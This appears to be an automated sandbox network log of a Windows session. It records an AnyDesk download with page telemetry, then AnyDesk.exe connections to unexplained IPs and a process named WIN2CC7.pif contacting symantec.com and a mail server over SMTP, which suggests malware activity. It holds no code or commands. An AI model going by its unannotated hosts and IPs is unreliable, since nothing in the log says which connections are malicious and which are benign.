GET https://cta-service-cms2.hubspot.com/web-interactives/public/v1/embed/combinedConfigs?portalId=7940397&currentUrl=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&utk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.3.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows

HTTP Request

OPTIONS https://api.hubspot.com/livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=3b5dfcf8035541a9b4520f1e214bc1fb&traceId=3b5dfcf8035541a9b4520f1e214bc1fb&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.3.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows

HTTP Request

GET https://track.hubspot.com/__ptq.gif?k=1&sd=1280x720&cd=24-bit&cs=UTF-8&ln=en-us&bfp=1331607227&v=1.1&a=7940397&rcu=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you&r=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&pu=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&t=Thank+you+for+downloading+AnyDesk&cts=1728144507850&vi=a5b3d1933284be27e3a7527fad5a6a3f&nc=false&u=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&b=261462610.3.1728144483689&ce=false&cc=0

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://api.hubspot.com/livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=3b5dfcf8035541a9b4520f1e214bc1fb&traceId=3b5dfcf8035541a9b4520f1e214bc1fb&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.3.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows

HTTP Response

200

HTTP Request

GET https://app.hubspot.com/conversations-visitor/7940397/threads/utk/3b5dfcf8035541a9b4520f1e214bc1fb?uuid=c0c99db6ece044748b1127f977c80f5d&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&domain=anydesk.com&inApp53=false&messagesUtk=3b5dfcf8035541a9b4520f1e214bc1fb&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f

HTTP Response

200

HTTP Request

POST https://exceptions.hubspot.com/api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true

HTTP Request

POST https://exceptions.hubspot.com/api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true

HTTP Request

POST https://app.hubspot.com/api/cartographer/v1/rhumb?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626

HTTP Request

GET https://app.hubspot.com/api/livechat-public/v1/bots/public/bot/2029034/welcomeMessages?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626&conversations-visitor-ui=static-1.20626&traceId=3b5dfcf8035541a9b4520f1e214bc1fb&sessionId=AMOaWbKAjfMJdhPltlchK6OaLIvf5w1BgqCg9_4ykQTHihhNvKBjD8dwq7KjRMDr4km9CuzL93gtwWEh4vhnaNFYtF965lkPx0WMlxUXxnPB5F3H1FAuvpbAk1dSOI1m9uzQoNzoKX60QPB9eAYi1v7uqXnhq2u-0EWln2IS4yPnN1ILyd7U-EQ&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://app.hubspot.com/api/cartographer/v1/ipl

HTTP Request

POST https://app.hubspot.com/api/cartographer/v1/performance?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626

HTTP Request

POST https://metrics-fe-na1.hubspot.com/metrics/v1/frontend/custom/send?hs_static_app=conversations-visitor-ui&hs_static_app_version=static-1.20626

HTTP Response

204

HTTP Response

200

HTTP Response

204

HTTP Response

204

HTTP Response

204

HTTP Request

POST https://app.hubspot.com/api/cartographer/v1/ipl

HTTP Response

204

HTTP Request

POST https://metrics-fe-na1.hubspot.com/metrics/v1/frontend/send

HTTP Response

204
104.16.78.142:443

https://js.usemessages.com/conversations-embed.js

tls, http2

msedge.exe

3.1kB
31.9kB
45
57

HTTP Request

GET https://js.usemessages.com/conversations-embed.js

HTTP Response

200
104.16.160.168:443

https://js.hs-analytics.net/analytics/1728144300000/7940397.js

tls, http2

msedge.exe

3.1kB
30.9kB
45
56

HTTP Request

GET https://js.hs-analytics.net/analytics/1728144300000/7940397.js

HTTP Response

200
104.18.40.240:443

https://js.hs-banner.com/7940397.js

tls, http2

msedge.exe

3.6kB
50.2kB
55
75

HTTP Request

GET https://js.hs-banner.com/7940397.js

HTTP Response

200
104.18.87.42:443

https://cdn.cookielaw.org/scripttemplates/otSDKStub.js

tls, http2

msedge.exe

3.3kB
11.0kB
44
49

HTTP Request

GET https://cdn.cookielaw.org/scripttemplates/otSDKStub.js

HTTP Response

403

HTTP Request

GET https://cdn.cookielaw.org/scripttemplates/otSDKStub.js

HTTP Response

403

HTTP Request

GET https://cdn.cookielaw.org/scripttemplates/otSDKStub.js

HTTP Response

403
216.58.201.100:443

https://www.google.com/js/bg/zEg4NaMiOUeKKZ2pqXY4HMvMf5VCq4avNU_6WgNs2Cw.js

tls, http2

msedge.exe

2.5kB
15.1kB
29
35

HTTP Request

GET https://www.google.com/js/bg/zEg4NaMiOUeKKZ2pqXY4HMvMf5VCq4avNU_6WgNs2Cw.js
104.18.80.204:443

https://perf-na1.hsforms.com/embed/v3/counters.gif?key=config-loaded-failure&value=1

tls, http

msedge.exe

1.6kB
5.5kB
8
9

HTTP Request

GET https://perf-na1.hsforms.com/embed/v3/counters.gif?key=config-loaded-failure&value=1

HTTP Response

403
104.18.40.240:443

https://js.hs-banner.com/cookie-banner-public/v1/cf-location

tls, http2

msedge.exe

2.7kB
4.7kB
36
38

HTTP Request

GET https://js.hs-banner.com/cookie-banner-public/v1/cf-location

HTTP Response

200
104.17.173.91:443

static.hsappstatic.net

tls

msedge.exe

701 B
132 B
4
3
104.17.173.91:443

https://static.hsappstatic.net/conversations-visitor-ui/static-1.9449/audio/notification.mp3

tls, http2

msedge.exe

3.1kB
15.9kB
41
48

HTTP Request

GET https://static.hsappstatic.net/conversations-visitor-ui/static-1.20154/sass/visitor.css

HTTP Response

200

HTTP Request

GET https://static.hsappstatic.net/conversations-visitor-ui/static-1.9449/audio/notification.mp3

HTTP Response

206
104.17.173.91:443

https://static.hsappstatic.net/conversations-visitor-ui/static-1.20571/i18n-data-data-locales-en-us.js

tls, http2

msedge.exe

9.0kB
367.8kB
166
285

HTTP Request

GET https://static.hsappstatic.net/head-dlb/static-1.1137/bundle.production.js

HTTP Request

GET https://static.hsappstatic.net/conversations-visitor-ui/static-1.20626/bundles/visitor.js

HTTP Request

GET https://static.hsappstatic.net/hubspot-dlb/static-1.865/bundle.production.js

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://static.hsappstatic.net/conversations-visitor-ui/static-1.20571/i18n-data-data-locales-en-us.js

HTTP Response

200
104.17.173.91:443

static.hsappstatic.net

tls

msedge.exe

701 B
670 B
4
4
159.69.19.197:443

download.anydesk.com

tls

msedge.exe

1.9kB
5.1kB
8
9
159.69.19.197:443

https://download.anydesk.com/AnyDesk.exe

tls, http2

msedge.exe

31.9kB
6.9MB
636
4859

HTTP Request

GET https://download.anydesk.com/AnyDesk.exe

HTTP Response

200

HTTP Request

GET https://download.anydesk.com/AnyDesk.exe

HTTP Response

200

HTTP Request

GET https://download.anydesk.com/AnyDesk.exe

HTTP Response

304
104.18.80.204:443

https://perf-na1.hsforms.com/embed/v3/counters.gif?key=config-loaded-failure&value=1

tls, http

msedge.exe

1.7kB
3.1kB
7
8

HTTP Request

GET https://perf-na1.hsforms.com/embed/v3/counters.gif?key=config-loaded-failure&value=1

HTTP Response

403
162.247.243.39:443

https://js-agent.newrelic.com/nr-spa-1216.min.js

tls, http2

msedge.exe

3.0kB
27.3kB
42
57

HTTP Request

GET https://js-agent.newrelic.com/nr-spa-1216.min.js

HTTP Response

200
162.247.243.30:443

https://bam-cell.nr-data.net/events/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=5176&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/32216ffab9654500808a6fcc397a1456

tls, http

msedge.exe

7.4kB
5.9kB
14
17

HTTP Request

GET https://bam-cell.nr-data.net/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=3484&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/32216ffab9654500808a6fcc397a1456&be=1151&fe=1340&dc=1306&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1728144488518,%22n%22:0,%22f%22:-1,%22dn%22:-1,%22dne%22:-1,%22c%22:-1,%22ce%22:-1,%22rq%22:7,%22rp%22:1025,%22rpe%22:1115,%22dl%22:1039,%22di%22:1306,%22ds%22:1306,%22de%22:1307,%22dc%22:1339,%22l%22:1339,%22le%22:1340%7D,%22navigation%22:%7B%7D%7D&fp=1473&fcp=1473&ja=%7B%22nrSnippetVersion%22:%221216%22,%22environment%22:%22prod%22,%22deployed%22:true,%22hublet%22:%22na1%22,%22hsOlderBrowserVersion%22:true,%22conditionalPolyfillsInstalled%22:false,%22portalId%22:7940397,%22package%22:%22conversations-visitor-ui%22,%22packageVersion%22:%221.20626%22,%22template%22:%22visitor-index.html.tsx%22,%22user-online%22:true,%22visibility%22:%22visible%22,%22currentVisibility%22:%22visible%22,%22reactRhumbVersion%22:%221.11409%22,%22reaganVersion%22:%22react-rhumb%22,%22route%22:%22/%22,%22numReaganChecksStarted%22:1,%22numPreviousReaganChecksAborted%22:0,%22avgDurationBeforePreviousReaganAborts%22:0,%22numPreviousReaganChecksFailed%22:0,%22numPreviousReaganChecksSuccessful%22:0%7D&jsonp=NREUM.setToken

HTTP Response

200

HTTP Request

POST https://bam-cell.nr-data.net/ins/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=5171&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/32216ffab9654500808a6fcc397a1456

HTTP Response

204

HTTP Request

POST https://bam-cell.nr-data.net/events/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=5176&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/32216ffab9654500808a6fcc397a1456
162.247.243.30:443

https://bam-cell.nr-data.net/events/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=986&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/19d7532a5e5749fbbfb32b46383ca6b0

tls, http

msedge.exe

7.2kB
2.3kB
12
14

HTTP Request

POST https://bam-cell.nr-data.net/events/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=5945&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/32216ffab9654500808a6fcc397a1456

HTTP Response

200

HTTP Request

POST https://bam-cell.nr-data.net/jserrors/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=5946&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/32216ffab9654500808a6fcc397a1456

HTTP Response

200

HTTP Request

POST https://bam-cell.nr-data.net/events/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=986&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/19d7532a5e5749fbbfb32b46383ca6b0

HTTP Response

200
162.247.243.30:443

https://bam-cell.nr-data.net/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=755&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/19d7532a5e5749fbbfb32b46383ca6b0&be=382&fe=515&dc=451&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1728144496042,%22n%22:0,%22f%22:-1,%22dn%22:-1,%22dne%22:-1,%22c%22:-1,%22ce%22:-1,%22rq%22:6,%22rp%22:319,%22rpe%22:366,%22dl%22:319,%22di%22:451,%22ds%22:451,%22de%22:452,%22dc%22:514,%22l%22:515,%22le%22:515%7D,%22navigation%22:%7B%7D%7D&fp=534&fcp=534&ja=%7B%22nrSnippetVersion%22:%221216%22,%22environment%22:%22prod%22,%22deployed%22:true,%22hublet%22:%22na1%22,%22hsOlderBrowserVersion%22:true,%22conditionalPolyfillsInstalled%22:false,%22portalId%22:7940397,%22package%22:%22conversations-visitor-ui%22,%22packageVersion%22:%221.20626%22,%22template%22:%22visitor-index.html.tsx%22,%22user-online%22:true,%22visibility%22:%22visible%22,%22currentVisibility%22:%22visible%22,%22reactRhumbVersion%22:%221.11409%22,%22reaganVersion%22:%22react-rhumb%22,%22route%22:%22/%22,%22numReaganChecksStarted%22:1,%22numPreviousReaganChecksAborted%22:0,%22avgDurationBeforePreviousReaganAborts%22:0,%22numPreviousReaganChecksFailed%22:0,%22numPreviousReaganChecksSuccessful%22:0%7D&jsonp=NREUM.setToken

tls, http

msedge.exe

4.9kB
1.3kB
10
10

HTTP Request

POST https://bam-cell.nr-data.net/events/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=5948&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/32216ffab9654500808a6fcc397a1456

HTTP Response

200

HTTP Request

GET https://bam-cell.nr-data.net/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=755&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/19d7532a5e5749fbbfb32b46383ca6b0&be=382&fe=515&dc=451&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1728144496042,%22n%22:0,%22f%22:-1,%22dn%22:-1,%22dne%22:-1,%22c%22:-1,%22ce%22:-1,%22rq%22:6,%22rp%22:319,%22rpe%22:366,%22dl%22:319,%22di%22:451,%22ds%22:451,%22de%22:452,%22dc%22:514,%22l%22:515,%22le%22:515%7D,%22navigation%22:%7B%7D%7D&fp=534&fcp=534&ja=%7B%22nrSnippetVersion%22:%221216%22,%22environment%22:%22prod%22,%22deployed%22:true,%22hublet%22:%22na1%22,%22hsOlderBrowserVersion%22:true,%22conditionalPolyfillsInstalled%22:false,%22portalId%22:7940397,%22package%22:%22conversations-visitor-ui%22,%22packageVersion%22:%221.20626%22,%22template%22:%22visitor-index.html.tsx%22,%22user-online%22:true,%22visibility%22:%22visible%22,%22currentVisibility%22:%22visible%22,%22reactRhumbVersion%22:%221.11409%22,%22reaganVersion%22:%22react-rhumb%22,%22route%22:%22/%22,%22numReaganChecksStarted%22:1,%22numPreviousReaganChecksAborted%22:0,%22avgDurationBeforePreviousReaganAborts%22:0,%22numPreviousReaganChecksFailed%22:0,%22numPreviousReaganChecksSuccessful%22:0%7D&jsonp=NREUM.setToken
162.247.243.30:443

https://bam-cell.nr-data.net/jserrors/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=988&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/19d7532a5e5749fbbfb32b46383ca6b0

tls, http

msedge.exe

2.1kB
5.1kB
8
10

HTTP Request

POST https://bam-cell.nr-data.net/jserrors/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=988&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/19d7532a5e5749fbbfb32b46383ca6b0

HTTP Response

200
104.18.80.204:443

https://perf-na1.hsforms.com/embed/v3/counters.gif?key=config-loaded-failure&value=1

tls, http

msedge.exe

1.7kB
2.4kB
7
8

HTTP Request

GET https://perf-na1.hsforms.com/embed/v3/counters.gif?key=config-loaded-failure&value=1

HTTP Response

403
18.66.248.79:443

https://anydesk.com/_static/manifest.json

tls, http2

msedge.exe

3.7kB
8.7kB
31
36

HTTP Request

GET https://anydesk.com/_static/manifest.json

HTTP Request

GET https://anydesk.com/_static/manifest.json

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/manifest.json

HTTP Response

200
104.18.80.204:443

https://perf-na1.hsforms.com/embed/v3/counters.gif?key=config-loaded-failure&value=1

tls, http

msedge.exe

1.7kB
3.1kB
7
8

HTTP Request

GET https://perf-na1.hsforms.com/embed/v3/counters.gif?key=config-loaded-failure&value=1

HTTP Response

403
35.190.80.1:443

a.nel.cloudflare.com

tls

msedge.exe

851 B
3.4kB
6
7
35.190.80.1:443

https://a.nel.cloudflare.com/report/v4?s=5n4dpcM02eE%2BzZD7MQmAcYCA6RKhhMQF%2BTfC8vBRz%2B93RPeIJ6YPG1L0EPCHO6mRAsnJ8FOqN7a68Ac7NjZDtPAUTlCNDO5gZtMtAaun6ipNiNdJIz7RmF%2FLDcdIpInohgtDz%2BeRy4GOCM7IzUI%3D

tls, http2

msedge.exe

5.6kB
9.8kB
59
66

HTTP Request

OPTIONS https://a.nel.cloudflare.com/report/v4?s=HIfAYdjoL0JvqGZFBV%2Bu5yoa1A4TFzMRaNodOViRc%2FwthtEQSNMmu3GOkVVWKVjuNl5bFV%2BfQKvAqiQRK4YN8MRIOHgATvW2LNB0wc8kJoVyYE6ZVK3JUdJ%2FKCDkr8WxRg%3D%3D

HTTP Request

OPTIONS https://a.nel.cloudflare.com/report/v4?s=HzrLQl7OFwHthB%2B4mmJoByqKVDvKO08CZbJ6jmYjtMnuVJMt39OoXMxY%2FQ5ckNFAQkQmOCeODFPoar1KEykRexEtRWVkpFnaRb6nrzTllJfz8Ng07p6YDi7tHCSCi%2BIJKmyNbXXKbdAzZE%2FOcpI%3D

HTTP Request

OPTIONS https://a.nel.cloudflare.com/report/v4?s=6pAdnQrYMedxWQPr6dO7OgVqYlKGZHgQQDaGadwI78Zmpikhb3yecYQyrjl%2FIk4uGaB5GNiIzrkMVW5BM1peARvjJNLfyJf7KcrEgSHRqFSlOCU4algAvmN65sDB8tjDfQ%3D%3D

HTTP Request

OPTIONS https://a.nel.cloudflare.com/report/v4?s=5n4dpcM02eE%2BzZD7MQmAcYCA6RKhhMQF%2BTfC8vBRz%2B93RPeIJ6YPG1L0EPCHO6mRAsnJ8FOqN7a68Ac7NjZDtPAUTlCNDO5gZtMtAaun6ipNiNdJIz7RmF%2FLDcdIpInohgtDz%2BeRy4GOCM7IzUI%3D

HTTP Request

OPTIONS https://a.nel.cloudflare.com/report/v4?s=6pAdnQrYMedxWQPr6dO7OgVqYlKGZHgQQDaGadwI78Zmpikhb3yecYQyrjl%2FIk4uGaB5GNiIzrkMVW5BM1peARvjJNLfyJf7KcrEgSHRqFSlOCU4algAvmN65sDB8tjDfQ%3D%3D

HTTP Request

OPTIONS https://a.nel.cloudflare.com/report/v4?s=5n4dpcM02eE%2BzZD7MQmAcYCA6RKhhMQF%2BTfC8vBRz%2B93RPeIJ6YPG1L0EPCHO6mRAsnJ8FOqN7a68Ac7NjZDtPAUTlCNDO5gZtMtAaun6ipNiNdJIz7RmF%2FLDcdIpInohgtDz%2BeRy4GOCM7IzUI%3D

HTTP Request

OPTIONS https://a.nel.cloudflare.com/report/v4?s=6pAdnQrYMedxWQPr6dO7OgVqYlKGZHgQQDaGadwI78Zmpikhb3yecYQyrjl%2FIk4uGaB5GNiIzrkMVW5BM1peARvjJNLfyJf7KcrEgSHRqFSlOCU4algAvmN65sDB8tjDfQ%3D%3D

HTTP Request

OPTIONS https://a.nel.cloudflare.com/report/v4?s=5n4dpcM02eE%2BzZD7MQmAcYCA6RKhhMQF%2BTfC8vBRz%2B93RPeIJ6YPG1L0EPCHO6mRAsnJ8FOqN7a68Ac7NjZDtPAUTlCNDO5gZtMtAaun6ipNiNdJIz7RmF%2FLDcdIpInohgtDz%2BeRy4GOCM7IzUI%3D
104.18.80.204:443

https://perf-na1.hsforms.com/embed/v3/counters.gif?key=config-loaded-failure&value=1

tls, http

msedge.exe

1.7kB
3.1kB
7
8

HTTP Request

GET https://perf-na1.hsforms.com/embed/v3/counters.gif?key=config-loaded-failure&value=1

HTTP Response

403
172.64.146.132:443

https://7940397.fs1.hubspotusercontent-na1.net/hub/7940397/hubfs/Chatbot%20figure%20-%20create%20AnyDesk%20FINAL_with%20Shadow.png?width=108&height=108

tls, http2

msedge.exe

3.0kB
8.3kB
39
42

HTTP Request

GET https://7940397.fs1.hubspotusercontent-na1.net/hub/7940397/hubfs/Chatbot%20figure%20-%20create%20AnyDesk%20FINAL_with%20Shadow.png?width=108&height=108

HTTP Response

200
57.129.37.28:443

boot.net.anydesk.com

tls

AnyDesk.exe

1.7kB
2.5kB
6
8
208.115.231.190:443

relay-c9990d24.net.anydesk.com

tls

AnyDesk.exe

48.6MB
2.9MB
43031
26966
18.173.233.31:80

api.playanext.com

http

AnyDesk.exe

738 B
794 B
5
4

HTTP Response

200
18.173.233.31:80

api.playanext.com

http

AnyDesk.exe

738 B
794 B
5
4

HTTP Response

200
79.114.209.143:7070

AnyDesk.exe

650 B
704 B
14
14
79.114.209.143:57382

AnyDesk.exe

832 B
16
192.168.100.15:7070

AnyDesk.exe

98 B
92 B
2
2
78.46.117.95:80

http://freedesktopsoft.com/images/banner_bg2.jpg

http

msedge.exe

1.7kB
10.1kB
17
19

HTTP Request

GET http://freedesktopsoft.com/butterflyondesktoplike.html

HTTP Response

200

HTTP Request

GET http://freedesktopsoft.com/images/banner_bg2.jpg

HTTP Response

200
78.46.117.95:80

http://freedesktopsoft.com/images/menubackground2.jpg

http

msedge.exe

1.9kB
22.9kB
23
31

HTTP Request

GET http://freedesktopsoft.com/main.css

HTTP Response

200

HTTP Request

GET http://freedesktopsoft.com/images/menubackground2.jpg

HTTP Response

200
78.46.117.95:80

http://freedesktopsoft.com/images/menubackgroundside2.jpg

http

msedge.exe

1.6kB
9.3kB
17
20

HTTP Request

GET http://freedesktopsoft.com/slider/slider.css

HTTP Response

200

HTTP Request

GET http://freedesktopsoft.com/images/menubackgroundside2.jpg

HTTP Response

200
78.46.117.95:80

http://freedesktopsoft.com/images/bodybackground.png

http

msedge.exe

1.8kB
16.4kB
21
27

HTTP Request

GET http://freedesktopsoft.com/button.css

HTTP Response

200

HTTP Request

GET http://freedesktopsoft.com/images/bodybackground.png

HTTP Response

200
78.46.117.95:80

http://freedesktopsoft.com/images/superman_likeus.gif

http

msedge.exe

2.1kB
37.0kB
28
43

HTTP Request

GET http://freedesktopsoft.com/slider/slider.js

HTTP Response

200

HTTP Request

GET http://freedesktopsoft.com/images/superman_likeus.gif

HTTP Response

200
78.46.117.95:80

http://freedesktopsoft.com/images/banner3.jpg

http

msedge.exe

1.8kB
44.6kB
30
47

HTTP Request

GET http://freedesktopsoft.com/images/banner3.jpg

HTTP Response

200
163.70.151.21:80

http://connect.facebook.net/en_US/all.js

http

msedge.exe

949 B
732 B
13
12

HTTP Request

GET http://connect.facebook.net/en_US/all.js

HTTP Response

301
172.217.169.14:80

http://www.google-analytics.com/r/__utm.gif?utmwv=5.7.2&utms=1&utmn=2142639942&utmhn=freedesktopsoft.com&utmcs=UTF-8&utmsr=1280x720&utmvp=1017x572&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=Butterfly%20On%20Desktop%20-%20Freeware%20software&utmhid=128639635&utmr=-&utmp=%2Fbutterflyondesktoplike.html&utmht=1728144794756&utmac=UA-39364152-1&utmcc=__utma%3D49514865.881488121.1728144795.1728144795.1728144795.1%3B%2B__utmz%3D49514865.1728144795.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmjid=1531739093&utmredir=1&utmu=qBAAAAAAAAAAAAAAAAAAAAAE~

http

msedge.exe

2.2kB
20.0kB
21
28

HTTP Request

GET http://www.google-analytics.com/ga.js

HTTP Response

200

HTTP Request

GET http://www.google-analytics.com/r/__utm.gif?utmwv=5.7.2&utms=1&utmn=2142639942&utmhn=freedesktopsoft.com&utmcs=UTF-8&utmsr=1280x720&utmvp=1017x572&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=Butterfly%20On%20Desktop%20-%20Freeware%20software&utmhid=128639635&utmr=-&utmp=%2Fbutterflyondesktoplike.html&utmht=1728144794756&utmac=UA-39364152-1&utmcc=__utma%3D49514865.881488121.1728144795.1728144795.1728144795.1%3B%2B__utmz%3D49514865.1728144795.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmjid=1531739093&utmredir=1&utmu=qBAAAAAAAAAAAAAAAAAAAAAE~

HTTP Response

200
163.70.151.21:443

connect.facebook.net

tls

msedge.exe

3.5kB
92.9kB
50
87
142.250.187.194:443

googleads.g.doubleclick.net

tls, http2

msedge.exe

1.3kB
6.2kB
16
17
142.250.187.238:443

fundingchoicesmessages.google.com

tls, http2

msedge.exe

1.4kB
8.6kB
17
19
95.165.168.168:8444

AnyDesk.exe

679 B
412 B
12
10
158.222.211.81:8080

AnyDesk.exe

633 B
452 B
11
11
95.165.168.168:8444

AnyDesk.exe

633 B
452 B
11
11
158.222.211.81:8080

AnyDesk.exe

633 B
452 B
11
11
95.165.168.168:8444

AnyDesk.exe

633 B
452 B
11
11
142.250.187.202:80

fonts.googleapis.com

IEXPLORE.EXE

466 B
372 B
10
9
142.250.187.202:80

http://fonts.googleapis.com/css?family=Audiowide

http

IEXPLORE.EXE

804 B
1.1kB
12
11

HTTP Request

GET http://fonts.googleapis.com/css?family=Audiowide

HTTP Response

200
104.21.11.28:80

http://www.veryicon.com/icon/png/Flag/Flag%204/Germany.png

http

IEXPLORE.EXE

862 B
1.4kB
12
11

HTTP Request

GET http://www.veryicon.com/icon/png/Flag/Flag%204/Germany.png

HTTP Response

301
104.21.11.28:80

http://www.veryicon.com/icon/png/Flag/Flag%204/United%20Kingdom.png

http

IEXPLORE.EXE

871 B
1.4kB
12
11

HTTP Request

GET http://www.veryicon.com/icon/png/Flag/Flag%204/United%20Kingdom.png

HTTP Response

301
104.21.11.28:443

www.veryicon.com

tls, http2

IEXPLORE.EXE

1.3kB
4.1kB
19
18
104.21.11.28:443

https://www.veryicon.com/icon/png/Flag/Flag%204/Germany.png

tls, http2

IEXPLORE.EXE

1.9kB
10.5kB
26
25

HTTP Request

GET https://www.veryicon.com/icon/png/Flag/Flag%204/United%20Kingdom.png

HTTP Request

GET https://www.veryicon.com/icon/png/Flag/Flag%204/Germany.png

HTTP Response

200

HTTP Response

200
142.250.200.35:80

http://c.pki.goog/r/r4.crl

http

IEXPLORE.EXE

878 B
4.2kB
14
14

HTTP Request

GET http://c.pki.goog/r/gsr1.crl

HTTP Response

200

HTTP Request

GET http://c.pki.goog/r/r4.crl

HTTP Response

200
199.232.192.193:80

i.imgur.com

IEXPLORE.EXE

466 B
372 B
10
9
199.232.192.193:80

http://i.imgur.com/zHNCk2e.gif

http

IEXPLORE.EXE

512 B
606 B
5
4

HTTP Request

GET http://i.imgur.com/zHNCk2e.gif

HTTP Response

301
142.250.179.227:80

http://fonts.gstatic.com/s/audiowide/v20/l7gdbjpo0cum0ckerWCdlg_I.woff

http

IEXPLORE.EXE

1.5kB
19.6kB
27
26

HTTP Request

GET http://fonts.gstatic.com/s/audiowide/v20/l7gdbjpo0cum0ckerWCdlg_I.woff

HTTP Response

200
142.250.179.227:80

fonts.gstatic.com

IEXPLORE.EXE

466 B
372 B
10
9
199.232.192.193:443

https://i.imgur.com/zHNCk2e.gif

tls, http2

IEXPLORE.EXE

1.6kB
8.7kB
23
22

HTTP Request

GET https://i.imgur.com/zHNCk2e.gif

HTTP Response

200
158.222.211.81:8080

AnyDesk.exe

633 B
452 B
11
11
95.165.168.168:8444

AnyDesk.exe

633 B
452 B
11
11
158.222.211.81:8080

AnyDesk.exe

633 B
452 B
11
11
104.18.37.111:80

http://www.symantec.com/

http

WIN2CC7.pif

827 B
1.2kB
12
11

HTTP Request

GET http://www.symantec.com/

HTTP Response

301
104.18.37.111:443

https://www.symantec.com/

tls, http

WIN2CC7.pif

1.7kB
10.4kB
22
21

HTTP Request

GET https://www.symantec.com/

HTTP Response

301
172.64.150.145:443

https://www.broadcom.com/products/cybersecurity

tls, http

WIN2CC7.pif

2.8kB
27.1kB
38
37

HTTP Request

GET https://www.broadcom.com/products/cyber-security

HTTP Response

301

HTTP Request

GET https://www.broadcom.com/products/cybersecurity

HTTP Response

200
142.250.150.27:25

alt2.aspmx.l.google.com

smtp

WIN2CC7.pif

284 B
630 B
5
7
95.165.168.168:8444

587 B
412 B
10
10
158.222.211.81:8080

587 B
372 B
10
9
95.165.168.168:8444

541 B
372 B
9
9
158.222.211.81:8080

495 B
332 B
8
8
